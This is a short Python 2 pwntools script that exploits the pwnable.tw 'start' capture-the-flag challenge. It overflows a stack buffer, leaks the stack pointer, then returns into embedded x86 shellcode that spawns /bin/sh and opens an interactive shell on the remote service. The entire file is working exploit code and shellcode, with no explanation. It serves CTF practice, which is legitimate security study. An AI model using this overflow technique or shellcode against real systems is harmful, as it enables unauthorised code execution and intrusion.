#!/usr/bin/env python

from pwn import *

p = remote('chall.pwnable.tw', 10000)

payload = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'

print len(payload)

p.recvuntil(':')
p.send('A' * 0x14 + p32(0x8048087))
leaked_esp = u32(p.recv(4))
p.recv(0x14 - 4)

print hex(leaked_esp)

p.sendline('A' * 0x14 + p32(leaked_esp + 0x14) + payload)

p.interactive()

